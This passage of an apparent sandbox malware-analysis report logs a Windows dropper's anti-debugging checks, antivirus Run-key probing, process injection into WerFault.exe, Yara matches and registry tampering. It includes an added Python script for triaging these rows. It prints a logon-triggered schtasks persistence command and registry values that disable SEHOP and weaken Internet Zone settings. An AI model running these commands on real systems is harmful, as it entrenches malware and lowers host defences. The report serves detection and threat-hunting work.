Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A85150 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_03355150 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_033351F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B651F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B85150 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WerFault.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WerFault.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Code function: 0_2_027728F0 LdrInitializeThunk
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02884963 RtlAddVectoredExceptionHandler,Sleep,Sleep

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Section unmapped: C:\Windows\SysWOW64\WerFault.exe base address: 180000
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WerFault.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WerFault.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AVP
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run MSC
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ISTray
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AVG_UI
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run BullGuard
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WRSVC
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run emsisoft anti-malware
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcui_exe
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ISTray
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ZoneAlarm
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run APVXDWIN
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WRSVC
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcpltui_exe
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bdagent
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AVG_UI
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run mcpltui_exe
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bdagent
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run avast
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MSC
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AVP
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BullGuard
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bkav
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run G Data AntiVirus Tray Application
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Trend Micro Titanium
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run G Data AntiVirus Tray Application
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run mcui_exe
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avast
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZoneAlarm
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run APVXDWIN
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Trend Micro Titanium
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run emsisoft anti-malware
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bkav
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000007.00000000.320980419.0000000001ED0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000007.00000000.318379297.0000000001ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: uProgram Manager*r
Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.310587078.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.570946607.00000000025D0000.00000002.00000001.00040000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000000.308496755.00000000025D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028656F5 GetTimeZoneInformation

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\WerFault.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500
Source: C:\Windows\SysWOW64\WerFault.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500
Source: C:\Windows\SysWOW64\WerFault.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidation
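The behaviour rows in the Anti Debugging and the two HIPS / PFW sections above are what an analyst feeds a triage script. The following Python is an added example and is not part of the Joe Sandbox report: it parses rows in the exported shape seen on this page (source column fused to the description, trailing "Jump to behavior" link text, code-function ids repeated at the end of the row), maps the anti-debugging evidence (HideFromDebugger, the NtSetInformationThread class argument 0x11, fs:[30h] PEB reads, DebugPort queries, rdtsc) to the process that produced it, and extracts the persistence and hardening-downgrade indicators (the ONLOGON scheduled task, the IFEO DisableExceptionChainValidation value, the Internet Settings zone writes) together with the AV autostart names the dropper probes under the Run keys. The eight input rows are copied from this report; the category list, the reading of the id fields as process index / dump stage / address, and every function name are this example's own assumptions, not Joe Sandbox's.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: eight rows copied from this report exactly as the HTML export
# leaves them (source fused to description, "Jump to behavior" link text appended).
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\WerFault.exeThread information set: HideFromDebuggerJump to behavior",
    r"Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028660AA NtSetInformationThread 000000FE,00000011,00000000,000000004_2_028660AA",
    r"Source: C:\Users\user\Desktop\BbbEtaIxAU.exeCode function: 0_2_00CD120A mov eax, dword ptr fs:[00000030h]0_2_00CD120A",
    r"Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AVPJump to behavior",
    r'Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHESTJump to behavior',
    r"Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidationJump to behavior",
    r"Source: C:\Windows\SysWOW64\WerFault.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500Jump to behavior",
]

# Description prefixes as the report prints them (this example's list), longest first so the
# alternation never stops at a shorter prefix of a longer category name.
CATEGORIES = sorted((
    "Thread information set", "Process queried", "Process created", "Process token adjusted",
    "Registry key queried", "Registry key value queried", "Registry key created or modified",
    "Registry key value created / modified", "Code function", "Window / User API",
    "File opened / queried", "Section unmapped", "Section loaded", "Binary or memory string",
    "Evasive API call chain", "API call chain", "Check user administrative privileges",
    "Process information queried", "Last function", "Thread sleep time", "Thread sleep count",
), key=len, reverse=True)
ROW_RE = re.compile(r"^Source: (?P<src>.+?)(?P<cat>" + "|".join(map(re.escape, CATEGORIES)) + r"): ?(?P<detail>.*)$")
# Code-function ids look like <process index>_<dump stage>_<address>; that reading is an
# assumption inferred from the report, the page does not document the id format.
FUNC_ID_RE = re.compile(r"^(?P<id>\d+_\d+_[0-9A-Fa-f]{8}) (?P<body>.*)$")
THREADINFOCLASS = {0x11: "ThreadHideFromDebugger"}  # NtSetInformationThread class 17

SCHTASKS_RE = re.compile(r'/TN\s+"(?P<name>[^"]+)".*?/TR\s+"(?P<run>[^"]+)"')
IFEO_RE = re.compile(r"\\Image File Execution Options\\(?P<image>[^ ]+) (?P<value>\S+)$")
ZONE_RE = re.compile(r"\\Internet Settings\\Zones\\(?P<zone>\d) (?P<value>\d+)$")
RUNKEY_RE = re.compile(r"\\CurrentVersion\\Run (?P<name>.+)$")


@dataclass
class Record:
    source: str
    category: str
    detail: str


def parse_line(line: str):
    """Split one exported row into source / category / detail and drop the link residue."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    detail = m["detail"].removesuffix("Jump to behavior")
    f = FUNC_ID_RE.match(detail)
    if f:  # "4_2_028660AA <body>4_2_028660AA": the id at the end is the export's link text
        detail = f["id"] + " " + f["body"].removesuffix(f["id"]).rstrip(",")
    return Record(m["src"], m["cat"], detail.strip())


def parse_report(lines):
    return [r for r in map(parse_line, lines) if r is not None]


def anti_debug_techniques(records):
    """Map each process image to the anti-debugging techniques the rows evidence."""
    found = defaultdict(set)
    for r in records:
        proc = r.source.split(" TID:")[0]
        parts = r.detail.split(" ", 1)
        body = parts[1] if len(parts) > 1 else ""
        if r.category == "Thread information set" and "HideFromDebugger" in r.detail:
            found[proc].add("ThreadHideFromDebugger")
        elif r.category == "Process queried" and r.detail == "DebugPort":
            found[proc].add("NtQueryInformationProcess(ProcessDebugPort)")
        elif r.category == "Code function" and "fs:[00000030h]" in body:
            # fs:[30h] is the TEB's PEB pointer on 32-bit Windows; BeingDebugged lives at PEB+2
            found[proc].add("PEB read via fs:[30h]")
        elif r.category == "Code function" and body.startswith("NtSetInformationThread"):
            args = [int(a, 16) for a in body.split(" ", 1)[1].split(",")]
            found[proc].add(THREADINFOCLASS.get(args[1], f"ThreadInfoClass 0x{args[1]:x}"))
        elif r.category == "Code function" and "rdtsc" in body:
            found[proc].add("rdtsc timing check")
    return found


def extract_iocs(records):
    """Persistence, hardening downgrades and the AV autostart names probed by the sample."""
    iocs = {"scheduled_tasks": [], "sehop_disabled_for": [], "ie_zone_values": [], "av_run_keys_probed": set()}
    for r in records:
        if r.category == "Process created" and "schtasks" in r.detail.lower():
            if m := SCHTASKS_RE.search(r.detail):
                iocs["scheduled_tasks"].append((m["name"], m["run"]))
        elif r.category == "Registry key value created / modified":
            m = IFEO_RE.search(r.detail)
            if m and m["value"] == "DisableExceptionChainValidation":  # SEHOP off for that image
                iocs["sehop_disabled_for"].append(m["image"])
        elif r.category == "Registry key created or modified":
            if m := ZONE_RE.search(r.detail):  # 2500 is the zone's Protected Mode switch
                iocs["ie_zone_values"].append((int(m["zone"]), int(m["value"])))
        elif r.category == "Registry key queried":
            if m := RUNKEY_RE.search(r.detail):
                iocs["av_run_keys_probed"].add(m["name"])
    return iocs


if __name__ == "__main__":
    recs = parse_report(REPORT_LINES)
    for proc, techniques in anti_debug_techniques(recs).items():
        print(proc, "->", ", ".join(sorted(techniques)))
    print(extract_iocs(recs))
```

Running it on the full report export rather than the eight embedded rows is a matter of reading the page's lines from a file; the scheduled-task name and the image under Image File Execution Options are the two values worth turning directly into host-hunting queries.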

Stealing of Sensitive Information

Source: Yara match | File source: 4.3.WerFault.exe.4e0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.WerFault.exe.2860000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.yvneslhpc.exe.1510000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.WerFault.exe.2860000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.WerFault.exe.4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.yvneslhpc.exe.b70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.yvneslhpc.exe.12b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.BbbEtaIxAU.exe.ac0000.0.unpack, type: UNPACKEDPE
